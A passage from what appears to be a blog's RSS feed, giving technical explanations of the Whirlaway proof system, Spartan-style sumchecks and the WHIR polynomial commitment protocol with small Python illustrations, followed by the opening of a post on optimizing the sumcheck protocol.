where $\tau$ is sampled at random by the verifier. Eventually, after applying the sumcheck protocol, the verifier is left with the check $\mathrm{eq} (\tau,r) c_3(r) (c_3 (r) - 1) = v_r$. The verifier can compute $\mathrm{eq} (\tau,r)$ efficiently, since it is a product of $n$ linear factors. For $c_3 (r)$, the verifier can query the oracle and then carry out the multiplications. Showing that the evaluation is valid can be done using the PCS; the problem is, how does the verifier know that $c_3 (r)$ is correct, given that the prover committed to $f_{trace} (x)$ and not to the individual columns?&lt;&#x2F;p&gt;
&lt;p&gt;The core idea is that we can run another instance of the sumcheck protocol, linking the trace polynomial with the columns and reducing the checks to a single point.&lt;&#x2F;p&gt;
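&lt;p&gt;A small Python sketch of the zerocheck sum above (the column values, field and random $\tau$ are illustrative assumptions): for a boolean column the weighted sum is exactly zero, while a single non-boolean entry makes it nonzero except with negligible probability over $\tau$.&lt;&#x2F;p&gt;

```python
import random

P = 2**31 - 1  # a prime field, chosen only for illustration

def eq(a, b):
    # eq(a, b) = prod_i (a_i b_i + (1 - a_i)(1 - b_i))
    prod = 1
    for ai, bi in zip(a, b):
        prod = prod * (ai * bi + (1 - ai) * (1 - bi)) % P
    return prod

def zerocheck_sum(col, tau):
    # sum over x in {0,1}^n of eq(tau, x) * c(x) * (c(x) - 1)
    n = len(tau)
    total = 0
    for j, cj in enumerate(col):
        x = tuple((j >> i) & 1 for i in range(n))
        total = (total + eq(tau, x) * cj * (cj - 1)) % P
    return total

tau = [random.randrange(P) for _ in range(3)]
boolean_col = [1, 0, 1, 1, 0, 0, 1, 0]
assert zerocheck_sum(boolean_col, tau) == 0

bad_col = boolean_col[:]
bad_col[2] = 5   # break booleanity in one row
assert zerocheck_sum(bad_col, tau) != 0   # fails to vanish w.h.p. over tau
```

The `eq` weighting is what prevents cancellations: without it, a cheating prover could make the errors in different rows sum to zero.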
&lt;h3 id=&quot;small-detour-spartan&quot;&gt;Small detour - Spartan&lt;&#x2F;h3&gt;
&lt;p&gt;Whirlaway is a proof system based on &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;solvable.group&#x2F;posts&#x2F;super-air&#x2F;#fnref:1&quot;&gt;SuperSpartan for AIR&lt;&#x2F;a&gt;, but we can gain an intuition on how it works by looking at other multivariate proof systems, such as Spartan. While there are some differences, the core principles remain similar. We will start with R1CS, which is a common way of representing circuits, where we have matrices $A, B, C$ (from $\mathbb{F}^{n \times m}$) and a vector $z = (w, 1, u)$, where $w$ is the witness vector, and $u$ is the instance vector such that&lt;br &#x2F;&gt;
$Az \circ Bz - Cz = 0$&lt;br &#x2F;&gt;
where $\circ$ denotes the Hadamard (component-wise) product of vectors. We can transform this into an instance of the sumcheck protocol, by noting the following:&lt;br &#x2F;&gt;
$$F (x) = \left( \sum_y A(x,y) z(y)\right) \left( \sum_y B(x,y) z(y)\right) - \left( \sum_y C(x,y) z(y)\right)$$&lt;br &#x2F;&gt;
$$\sum_x \mathrm{eq} (\tau , x) F(x) = 0$$&lt;br &#x2F;&gt;
We can have the prover do the work and provide $a(x) = \sum_y A(x,y) z(y)$, $b(x) = \sum_y B(x,y) z(y)$ and $c(x) = \sum_y C(x,y) z(y)$. The zerocheck can be reduced to&lt;br &#x2F;&gt;
$$\mathrm{eq} (\tau, r_x) F(r_x) = v_x = \mathrm{eq} (\tau, r_x) (a (r_x ) b (r_x) - c( r_x ))$$&lt;br &#x2F;&gt;
The prover can then show that $a (r_x ), b (r_x ), c( r_x )$ are correct by running the following sumchecks:&lt;br &#x2F;&gt;
$$\sum_y A(r_x , y) z(y) = a (r_x )$$&lt;br &#x2F;&gt;
$$\sum_y B(r_x , y) z(y) = b (r_x )$$&lt;br &#x2F;&gt;
$$\sum_y C(r_x , y) z(y) = c (r_x )$$&lt;&#x2F;p&gt;
&lt;p&gt;All these can be combined into a single check by taking random linear combinations,&lt;br &#x2F;&gt;
$$\sum_y \left(\alpha A(r_x , y) + \beta B(r_x , y) + \gamma C( r_x , y ) \right) z(y) = \alpha a (r_x ) + \beta b (r_x ) + \gamma c (r_x )$$&lt;&#x2F;p&gt;
&lt;p&gt;This avoids working with one large sumcheck, breaking it into one sumcheck over a linear combination of the columns and another over a linear combination of the rows. This idea is exploited in Whirlaway to first perform a zerocheck with the columns and then reduce the evaluation of the columns to an evaluation of the trace polynomial.&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;p&gt;&lt;strong&gt;Steps in the protocol:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Commit to the trace&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Compute the trace columns that are necessary to evaluate the transition constraints, $c_k^{up}$ and $c_k^{down}$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Perform a zerocheck with those columns and the polynomial constraints, which reduces the verifier&amp;#39;s task to evaluating $c_k^{up}$ and $c_k^{down}$ at the random point $\delta$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. Batch the evaluation claims for all the columns and perform the inner sumcheck.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    5. Find the multilinear extension of the columns&amp;#39; evaluations, evaluate it at $z$, and check that this matches the opening of the commitment to the trace at the point $(z, \delta)$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;whir&quot;&gt;WHIR&lt;&#x2F;h2&gt;
&lt;p&gt;WHIR is an interactive oracle proof of proximity to constrained Reed-Solomon codes. FRI is also an interactive oracle proof of proximity, but to Reed-Solomon codes. We can transform WHIR into a polynomial commitment scheme in the same way we transformed FRI into a PCS, via committing to the codewords using Merkle trees.&lt;&#x2F;p&gt;
&lt;p&gt;Before jumping into the actual protocol, we will begin with the definitions of error correcting codes.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Definition (error-correcting code)&lt;&#x2F;strong&gt; : An error-correcting code of length $n$ over an alphabet $A$ is a subset of $A^n$. In particular, a linear code over a finite field $\mathbb{F}$ is a subspace of $\mathbb{F}^n$.&lt;&#x2F;p&gt;
&lt;p&gt;Linear codes are important because they allow for efficient encoding, and any linear combination of codewords is again a codeword.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Definition (interleaved code)&lt;&#x2F;strong&gt; : Given a code $C \subseteq A^n$, the $m$ -interleaved code is the code $C^m \subseteq { (A^m ) }^n$. Each element of a codeword is now an element of $A^m$.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;1-smooth-reed-solomon-codes&quot;&gt;1. Smooth Reed-Solomon Codes&lt;&#x2F;h3&gt;
&lt;p&gt;Given a finite field $\mathbb{F}$, a degree $d = 2^m$ and an evaluation domain $\mathcal{L} \subseteq \mathbb{F}^\star$, which must be a multiplicative &lt;em&gt;coset&lt;&#x2F;em&gt; whose size $n$ is a power of two, we define&lt;br &#x2F;&gt;
$$RS \left[\mathbb{F}, \mathcal{L}, m \right] = \{ f: \mathcal{L} \to \mathbb{F} \mid \exists g \in \mathbb{F}^{ \leq d - 1} \left[X\right] \text{ s.t. } f(x) = g(x) \ \forall x \in \mathcal{L} \}.$$&lt;br &#x2F;&gt;
In other words, it represents all the evaluations that come from a polynomial of small degree. In proof systems, the prover claims that a function $f$ (or rather its evaluations) is in $RS\left[\mathbb{F}, \mathcal{L}, m\right]$ to convince the verifier that $f$ is close to a polynomial of degree at most $d - 1$.&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;Let’s recall what a &lt;em&gt;coset&lt;&#x2F;em&gt; is: for example, in Stark101 we have a trace of one column of length 1023, so we define as an evaluation domain a subgroup $G \subseteq \mathbb{F}^\star$ with order $|G| = 1024$. Then we interpolate and want to extend the domain to eight times its size (blowup factor 8), creating a Reed-Solomon error-correcting code. We take a subgroup $H \subseteq \mathbb{F}^\star$ with $|H| = 8192$, and define as the LDE the &lt;em&gt;coset&lt;&#x2F;em&gt; of $H$ $$wH = \{ w \cdot h_1, \ldots, w \cdot h_{8192} \}$$ with $w$ a generator of $\mathbb{F}^\star$.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;h3 id=&quot;2-multilinear-reed-solomon-codes&quot;&gt;2. Multilinear Reed-Solomon Codes:&lt;&#x2F;h3&gt;
&lt;p&gt;Equivalently, such Reed–Solomon codes can be viewed as evaluations of multilinear polynomials in $m$ variables:&lt;&#x2F;p&gt;
&lt;p&gt;$$\begin{align*}&lt;br &#x2F;&gt;
RS\left[\mathbb{F}, \mathcal{L}, m\right] &amp;amp;= \{ f: \mathcal{L} \to \mathbb{F} \mid \exists g \in \mathbb{F}^{ &amp;lt; d} [X] \text{ s.t. } f(x) = g(x) \ \forall x \in \mathcal{L} \} \newline&lt;br &#x2F;&gt;
&amp;amp;= \{ f: \mathcal{L} \to \mathbb{F} \mid \exists \hat f \in \mathbb{F}^{\leq 1} [X_0, \ldots, X_{m-1}] \text{ s.t. } f(x) = \hat f(x^{ 2^{0} }, x^{ 2^{1} }, \ldots, x^{ 2^{ m - 1 } }) \ \forall x \in \mathcal{L}\}&lt;br &#x2F;&gt;
\end{align*}$$&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Example:&lt;&#x2F;strong&gt; If $m = 3$, then $2^m - 1 = 7$ and $2^{m - 1} = 4$. We can represent a univariate polynomial $g$ of degree at most $7$ as a 3-variable multilinear polynomial $\hat f$. Indeed, we just need three variables $x_0, x_1, x_2$, since $x_0 \cdot x_1 \cdot x_2 = x^1 \cdot x^2 \cdot x^4 = x^7.$ Conversely, if we have a 3-variable multilinear polynomial $\hat f$, we can represent it as a univariate polynomial $g$ of degree at most $7$: the maximum degree is attained by $x_0 \cdot x_1 \cdot x_2 = x^7.$ For example, the polynomial $$g(x) = a_0 + a_3x^3 + a_6x^6$$&lt;br &#x2F;&gt;
is equivalent to the polynomial&lt;br &#x2F;&gt;
$$\hat f(x_0, x_1, x_2) = a_0 + a_3 x_0 x_1 + a_6 x_1 x_2$$&lt;&#x2F;p&gt;
&lt;h3 id=&quot;3-constrained-reed-solomon-code&quot;&gt;3. Constrained Reed–Solomon Code:&lt;&#x2F;h3&gt;
&lt;p&gt;It is a smooth Reed-Solomon code with an additional constraint. Given a weight polynomial $\hat w \in \mathbb{F} \left[Z, X_1, \ldots, X_m \right]$ and a target $\sigma \in \mathbb{F}$, we additionally require&lt;br &#x2F;&gt;
$$ \sum_{b \in \{0, 1 \}^m} \hat w(\hat f(b), b) = \sigma.$$&lt;&#x2F;p&gt;
&lt;p&gt;This can help enforce a particular evaluation of the polynomial (which reduces the number of codewords that could simultaneously be close to $f$ and fulfill the condition) or show that the polynomial has zeros over some set.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;why-do-we-use-this&quot;&gt;Why do we use this?&lt;&#x2F;h4&gt;
&lt;p&gt;Given an evaluation point $r = (r_1, \ldots, r_m) \in \mathbb{F}^m$, we want to additionally constrain that $$\hat f (r) = \sigma.$$&lt;br &#x2F;&gt;
So if we choose&lt;br &#x2F;&gt;
$$\hat w(Z, X_1, \ldots X_m) = Z \cdot eq( (X_1, \ldots, X_m), (r_1, \ldots, r_m)),$$&lt;br &#x2F;&gt;
then we have&lt;br &#x2F;&gt;
$$ \sigma = \sum_{b \in \{0, 1 \}^m} \hat w(\hat f(b), b) = \sum_{b \in \{0, 1 \}^m} \hat f(b) \cdot eq( b, r) = \hat f(r).$$&lt;&#x2F;p&gt;
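&lt;p&gt;The computation above can be checked numerically; the following Python sketch (field, evaluations and $r$ are arbitrary example choices) confirms that the weighted sum with $\hat w(Z, X) = Z \cdot eq(X, r)$ recovers $\hat f(r)$:&lt;&#x2F;p&gt;

```python
P = 97  # a small prime field, chosen only for illustration

def eq(a, b):
    prod = 1
    for ai, bi in zip(a, b):
        prod = prod * (ai * bi + (1 - ai) * (1 - bi)) % P
    return prod

def eval_mle(f_evals, z):
    # multilinear extension via the Lagrange (eq) basis
    m = len(z)
    total = 0
    for k, fk in enumerate(f_evals):
        kb = tuple((k >> i) & 1 for i in range(m))
        total = (total + fk * eq(kb, z)) % P
    return total

f = [3, 1, 4, 1, 5, 9, 2, 6]   # evaluations of f over {0,1}^3
r = (10, 20, 30)               # the constrained evaluation point

sigma = 0
for k, fk in enumerate(f):
    b = tuple((k >> i) & 1 for i in range(3))
    # weight w_hat(f_hat(b), b) = f_hat(b) * eq(b, r)
    sigma = (sigma + fk * eq(b, r)) % P

assert sigma == eval_mle(f, r)
```

So fixing the target $\sigma$ pins down the claimed evaluation $\hat f(r)$ of the committed polynomial.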
&lt;h2 id=&quot;whir-protocol&quot;&gt;WHIR Protocol&lt;&#x2F;h2&gt;
&lt;h3 id=&quot;preliminary-notations&quot;&gt;Preliminary notations&lt;&#x2F;h3&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $\rho := \frac{ 2^m }{n}$ is the _rate of the code_ , where $n = |\mathcal{L}|$ and $m$ is the number of variables.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $\mathcal{L}^{ (i) } = \\{x^i : x \in \mathcal{L} \\}$. Since $\mathcal{L}$ is smooth, if $i$ is a power of two, then $|\mathcal{L}^{(i)}| = |\mathcal{L}| &#x2F; i.$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $k &amp;gt; 1$ is the _folding parameter_.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h3 id=&quot;the-basic-idea&quot;&gt;The basic idea&lt;&#x2F;h3&gt;
&lt;p&gt;Each WHIR iteration will reduce the task of testing&lt;br &#x2F;&gt;
$$f \in C = CRS\left[\mathbb{F}, \mathcal{L}, m, \hat w, \sigma \right]$$&lt;br &#x2F;&gt;
to the task of testing&lt;br &#x2F;&gt;
$$f \in C^\prime = CRS\left[\mathbb{F}, \mathcal{L}^{(2)}, m - k, \hat w^\prime , \sigma^\prime \right],$$&lt;br &#x2F;&gt;
where the size of the domain decreases from $n$ to $n&#x2F;2$, and the number of variables decreases from $m$ to $m - k$.&lt;&#x2F;p&gt;
&lt;p&gt;The WHIR protocol has $M = m&#x2F;k$ of these WHIR iterations, reducing the proximity test for&lt;br &#x2F;&gt;
$$C^{(0)} = C$$&lt;br &#x2F;&gt;
to a proximity test for&lt;br &#x2F;&gt;
$$C^{ (M) } = CRS\left[\mathbb{F}, \mathcal{L}^{ (2^M) }, O(1), \hat w^{ (M) }, \sigma^{ (M) } \right].$$&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;Obs.&lt;&#x2F;em&gt; $O(1)$: It doesn’t depend on $m$ or $k$.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;protocol-steps&quot;&gt;Protocol Steps&lt;&#x2F;h3&gt;
&lt;h4 id=&quot;1-sumcheck-rounds&quot;&gt;1. Sumcheck rounds&lt;&#x2F;h4&gt;
&lt;p&gt;The Prover and Verifier apply $k$ rounds of the sumcheck protocol for the claim&lt;br &#x2F;&gt;
$$\sum_{b \in \{0, 1 \}^m} \hat w(\hat f(b), b) = \sigma.$$&lt;&#x2F;p&gt;
&lt;p&gt;The protocol starts with&lt;br &#x2F;&gt;
$$ \hat w (Z, X) = Z \cdot eq(X, r)$$&lt;br &#x2F;&gt;
where $\hat f(r) = \sigma$.&lt;&#x2F;p&gt;
&lt;p&gt;The Prover sends the univariate round polynomials $h_1, \ldots, h_k$, obtained by fixing the first free variable in each round and summing over the remaining ones.&lt;&#x2F;p&gt;
&lt;p&gt;The Verifier samples $\alpha_1, \ldots, \alpha_k \in \mathbb{F}$, and checks $h_1 (0) + h_1 (1) = \sigma$ and $h_j(0) + h_j(1) = h_{j - 1}(\alpha_{j - 1})$.&lt;&#x2F;p&gt;
&lt;p&gt;This reduces the initial claim to the claim&lt;br &#x2F;&gt;
$$\sum_{b \in \{0, 1 \}^{ m - k}} \hat w (\hat f(\alpha_1, \ldots, \alpha_k, b_{k +1 }, \ldots, b_m), (\alpha_1, \ldots, \alpha_k, b_{k + 1}, \ldots, b_m)) = h_k(\alpha_k).$$&lt;&#x2F;p&gt;
&lt;p&gt;In simpler notation:&lt;br &#x2F;&gt;
$$\sum_{b \in \{0, 1 \}^{ m - k}} \hat w(\hat f(\alpha, b), (\alpha, b)) = h_k (\alpha_k).$$&lt;&#x2F;p&gt;
&lt;h4 id=&quot;2-send-folded-function&quot;&gt;2. Send folded function&lt;&#x2F;h4&gt;
&lt;p&gt;The Prover sends a function $g: \mathcal{L}^{(2)} \to \mathbb{F}$. In the honest case, $$\hat g(X) = \hat f(\alpha, X),$$ so that $\hat g \in \mathbb{F}^{\leq 1} \left[X_1, \ldots, X_{ m - k}\right]$, and $g$ represents the evaluations of $\hat g$ on the domain&lt;br &#x2F;&gt;
$$ g(x) = \hat g(x^{ 2^0 }, \ldots, x^{ 2^{ m - k - 1 }}) = \hat f(\alpha_1, \ldots, \alpha_k, x^{ 2^0 }, \ldots, x^{ 2^{ m - k - 1 }} ) \quad \forall x \in \mathcal{L}^{(2)}.$$&lt;&#x2F;p&gt;
&lt;h4 id=&quot;3-out-of-domain-sample-and-evaluation&quot;&gt;3. Out-of-domain sample and evaluation&lt;&#x2F;h4&gt;
&lt;p&gt;The Verifier samples and sends $z_0 \in \mathbb{F}$. The prover evaluates and sends $y_0 = \hat g(z_0)$.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;Abuse of notation:&lt;&#x2F;em&gt; We denote $\hat g(z_0) = \hat g(z_0^{ 2^0 }, z_0^{ 2^1 }, \ldots, z_0^{ 2^{ m - k - 1}})$.&lt;&#x2F;p&gt;
&lt;p&gt;The out-of-domain sampling essentially forces the prover to choose one of the possible polynomials within a list of polynomials associated with the oracle.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;4-shift-queries-and-combination-randomness&quot;&gt;4. Shift queries and combination randomness&lt;&#x2F;h4&gt;
&lt;p&gt;The Verifier samples and sends $z_1, \ldots, z_t \in \mathcal{L}^{ (2^k) }$, where $t$ is the number of queries required in this WHIR iteration, determined by the security parameter $\lambda$. Then, for each $i \in \{1, \ldots, t\}$, the Verifier queries $f$ and obtains&lt;br &#x2F;&gt;
$$y_i = \text{Fold}(f, \alpha) (z_i)$$&lt;br &#x2F;&gt;
Then, the Verifier samples and sends $\gamma \in \mathbb{F}$.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What is the Fold function?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Folding of Reed–Solomon codes is a method for lowering the complexity of a code at a relatively small cost and lies at the core of IOPPs for Reed–Solomon codes.&lt;&#x2F;p&gt;
&lt;p&gt;Given $f: \mathcal{L} \to \mathbb{F}$ and $a \in \mathbb{F}$ we define $\text{Fold}(f, a): \mathcal{L}^{(2)} \to \mathbb{F}$ as follows: For each $z \in \mathcal{L}^{(2)}$&lt;&#x2F;p&gt;
&lt;p&gt;$$\text{Fold}(f, a) (z) = \frac{f(x) + f(- x)}{2} + a \cdot \frac{f(x) - f(- x)}{2x},$$&lt;&#x2F;p&gt;
&lt;p&gt;where $x$ is the point in $\mathcal{L}$ such that $z = x^2 = (- x)^2$.&lt;&#x2F;p&gt;
&lt;p&gt;Now, given a vector $\alpha = (\alpha_1, \ldots, \alpha_k) \in \mathbb{F}^k,$ we denote&lt;br &#x2F;&gt;
$$\text{Fold}(f, \alpha): \mathcal{L}^{ (2^{k}) } \to \mathbb{F}$$&lt;br &#x2F;&gt;
to the recursive folding on each of the entries in $\alpha$. That is:&lt;&#x2F;p&gt;
&lt;p&gt;$$\text{Fold}(f, (\alpha_j, \ldots, \alpha_k)) = \text{Fold}(\text{Fold}(f, \alpha_j), (\alpha_{j+1}, \ldots, \alpha_k))$$&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;Example:&lt;&#x2F;em&gt; If $k = 3$, then&lt;br &#x2F;&gt;
$$\text{Fold}(f, (\alpha_1, \alpha_2, \alpha_3)) = \text{Fold}(\text{Fold}(f, \alpha_1), (\alpha_2, \alpha_3))$$&lt;&#x2F;p&gt;
&lt;p&gt;Let’s say $\text{Fold}(f, \alpha_1) = f_1$. Then,&lt;&#x2F;p&gt;
&lt;p&gt;$$\text{Fold}(\text{Fold}(f, \alpha_1), (\alpha_2, \alpha_3)) = \text{Fold}(f_1, (\alpha_2, \alpha_3)) = \text{Fold}(\text{Fold}(f_1, \alpha_2), \alpha_3)$$&lt;&#x2F;p&gt;
&lt;p&gt;Let’s say $\text{Fold}(f_1, \alpha_2) = f_2$. Then,&lt;&#x2F;p&gt;
&lt;p&gt;$$\text{Fold}(\text{Fold}(f_1, \alpha_2), \alpha_3) = \text{Fold}(f_2, \alpha_3)$$&lt;&#x2F;p&gt;
&lt;p&gt;So in conclusion,&lt;br &#x2F;&gt;
$$\begin{align}&lt;br &#x2F;&gt;
\text{Fold}(f, (\alpha_1, \alpha_2, \alpha_3)) &amp;amp;= \text{Fold}(f_2, \alpha_3) \newline&lt;br &#x2F;&gt;
&amp;amp;= \text{Fold}(\text{Fold}(\text{Fold}(f, \alpha_1), \alpha_2), \alpha_3)&lt;br &#x2F;&gt;
\end{align}$$&lt;&#x2F;p&gt;
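&lt;p&gt;A Python sketch of folding over a concrete field (we take $\mathbb{F}_{17}$ and its order-8 multiplicative subgroup as an illustrative domain): for an honest $f$ given by a polynomial $g(x) = g_e(x^2) + x \cdot g_o(x^2)$, the fold at $a$ is the evaluation table of $g_e + a \cdot g_o$ on the squared domain.&lt;&#x2F;p&gt;

```python
P = 17                       # small prime field, chosen only for illustration
OMEGA = 9                    # generator of the order-8 subgroup of F_17^*
L = [pow(OMEGA, i, P) for i in range(8)]

def inv(a):
    return pow(a, P - 2, P)  # modular inverse via Fermat's little theorem

def fold(f, a):
    # f: dict x -> f(x) on a domain closed under negation; returns the
    # folded function on the squared domain L^(2)
    out = {}
    for x in f:
        z = x * x % P
        if z in out:
            continue
        fx, fmx = f[x], f[(P - x) % P]
        even = (fx + fmx) * inv(2) % P           # (f(x) + f(-x)) / 2
        odd = (fx - fmx) * inv(2 * x % P) % P    # (f(x) - f(-x)) / (2x)
        out[z] = (even + a * odd) % P
    return out

def fold_many(f, alphas):
    # recursive folding, one entry of alpha at a time
    for a in alphas:
        f = fold(f, a)
    return f

# honest case: f = evaluations of g(x) = 1 + 2x + 3x^2 + 4x^3, so
# g_e(y) = 1 + 3y, g_o(y) = 2 + 4y and Fold(f, 5) = g_e + 5*g_o = 11 + 23y
f = {x: (1 + 2*x + 3*x*x + 4*x**3) % P for x in L}
folded = fold(f, 5)
assert all(v == (11 + 23 * z) % P for z, v in folded.items())

# folding twice reduces a degree-3 polynomial to a constant
assert len(set(fold_many(f, [5, 7]).values())) == 1
```

Each fold halves the domain and halves the degree bound, which is exactly why $k$ folds let the prover work with $m - k$ variables.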
&lt;h4 id=&quot;6-recursive-claim&quot;&gt;5. Recursive claim&lt;&#x2F;h4&gt;
&lt;p&gt;Both Prover and Verifier define the new weight polynomial and target&lt;br &#x2F;&gt;
$$\hat w^\prime (Z, X) = \hat w(Z, \alpha, X) + Z \cdot \sum_{i = 0}^t \gamma^{i + 1} \cdot \text{eq}(z_i, X)$$&lt;br &#x2F;&gt;
$$\sigma^\prime = h_k(\alpha_k) + \sum_{i = 0}^t \gamma^{i+1} \cdot y_i$$&lt;&#x2F;p&gt;
&lt;p&gt;and recurse on the claim that&lt;br &#x2F;&gt;
$$g \in CRS\left[\mathbb{F}, \mathcal{L}^{(2)}, m - k, \hat w^\prime, \sigma^\prime \right].$$&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Why this weight and this target?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;We want to see how this iteration reduces the claim&lt;br &#x2F;&gt;
$$f \in C = CRS\left[\mathbb{F}, \mathcal{L}, m, \hat w, \sigma\right]$$ to the claim $$g \in C^\prime = CRS\left[\mathbb{F}, \mathcal{L}^{(2)}, m-k, \hat w^\prime, \sigma^\prime\right].$$&lt;br &#x2F;&gt;
First, note that $\hat w \in \mathbb{F} \left[Z, X_1, \ldots, X_m\right]$ and $\hat w^\prime \in \mathbb{F}\left[Z, X_1, \ldots, X_{ m - k }\right]$.&lt;&#x2F;p&gt;
&lt;p&gt;If the Prover is honest and $f \in C$, why does $g \in C^\prime$?&lt;&#x2F;p&gt;
&lt;p&gt;On one hand, $g \in RS\left[\mathbb{F}, \mathcal{L}^{(2)}, m - k\right]$ because $\hat g \in \mathbb{F}^{\leq 1} \left[X_1, \ldots, X_{ m - k }\right]$ is such that $g(x) = \hat f(\alpha_1, \ldots, \alpha_k, x^{ 2^0 }, \ldots, x^{ 2^{ m - k - 1 }})$.&lt;&#x2F;p&gt;
&lt;p&gt;On the other hand, we need to check the sum constraint: We want to prove that&lt;br &#x2F;&gt;
$$\sum_{b \in \{0, 1 \}^{ m - k}} \hat w^\prime (\hat g(b), b) = \sigma^\prime .$$&lt;br &#x2F;&gt;
Let’s see:&lt;br &#x2F;&gt;
$$\sum_{b \in \{0, 1 \}^{ m - k}} \hat w^\prime (\hat g(b), b) = \sum_{b \in \{0, 1 \}^{ m - k}} \left[ \hat w(\hat f(\alpha, b), (\alpha, b)) + \hat f(\alpha, b) \sum_{i = 0}^t \gamma^{i + 1} \cdot eq(z_i, b) \right]$$&lt;br &#x2F;&gt;
$$\sigma^\prime = h_k(\alpha_k) + \sum_{i = 0}^t \gamma^{ i + 1} \cdot y_i$$&lt;&#x2F;p&gt;
&lt;p&gt;Since&lt;br &#x2F;&gt;
$$h_k(\alpha_k) = \sum_{b \in \{0, 1 \}^{ m - k}} \hat w(\hat f(\alpha, b), (\alpha, b)),$$&lt;br &#x2F;&gt;
we just need to check that&lt;br &#x2F;&gt;
$$\sum_{i = 0}^t \gamma^{i+1} \cdot y_i = \sum_{b \in \{0, 1 \}^{ m - k}} \hat f(\alpha, b) \cdot \sum_{i = 0}^t \gamma^{i + 1} \cdot eq(z_i, b),$$&lt;br &#x2F;&gt;
where&lt;br &#x2F;&gt;
$$\sum_{i = 0}^t \gamma^{i + 1} \cdot y_i = \gamma \cdot \hat f(\alpha, z_0) + \sum_{i = 1}^t \gamma^{i + 1} \cdot \text{Fold}(f, \alpha)(z_i).$$&lt;&#x2F;p&gt;
&lt;h2 id=&quot;next-steps&quot;&gt;Next steps&lt;&#x2F;h2&gt;
&lt;p&gt;In upcoming posts, we will be covering several aspects related to the security of WHIR, its use as a proving backend for efficient post-quantum secure signature aggregation and possible improvements to reduce proof size and proving time.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Optimizing Sumcheck</title>
          <pubDate>Thu, 28 Aug 2025 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/optimizing-sumcheck/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/optimizing-sumcheck/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/optimizing-sumcheck/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;In this article, we review some of the optimizations for the SUMCHECK protocol discussed in the recent article by Bagad, Dao, Domb and Thaler. The authors tackle the problem of the &lt;em&gt;disproportionate cost of field multiplications&lt;&#x2F;em&gt;. In many SNARK applications, the sum-check protocol operates over &lt;em&gt;extension fields&lt;&#x2F;em&gt;, which are much larger than their &lt;em&gt;base fields&lt;&#x2F;em&gt;. While the actual values being summed or computed are often “small” (e.g., 32-bit integers or elements of the smaller base field), multiplications involving elements from the larger extension field (large-large (ll) multiplications) are significantly more expensive than those within the smaller base field (small-small (ss) multiplications). This cost disparity can be substantial, sometimes spanning orders of magnitude.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;quick-review-of-the-sumcheck-protocol&quot;&gt;Quick review of the SUMCHECK Protocol&lt;&#x2F;h2&gt;
&lt;p&gt;As the reader might already know, the SUMCHECK protocol is a fundamental interactive proof system in verifiable computing and cryptography, first introduced by Lund, Fortnow, Karloff, and Nisan around 1990-1991. We will begin by broadly describing its purpose and typical usage, and then look into implementation details where some clever observations lead to enhanced performance. The reader familiar with the protocol can safely skip the first section; those who want a quick refresher are invited to read on.&lt;&#x2F;p&gt;
&lt;p&gt;The primary purpose of the SUMCHECK Protocol is for a &lt;em&gt;prover (P)&lt;&#x2F;em&gt; to convince a &lt;em&gt;verifier (V)&lt;&#x2F;em&gt; that a &lt;em&gt;large sum of polynomial evaluations&lt;&#x2F;em&gt; equals a specified value, without the verifier having to compute the entire sum herself. This sum is typically over all inputs in the &lt;em&gt;Boolean hypercube&lt;&#x2F;em&gt; , $\{0,1 \}^l$, for an $l$-variate polynomial $g$.&lt;&#x2F;p&gt;
&lt;blockquote&gt;
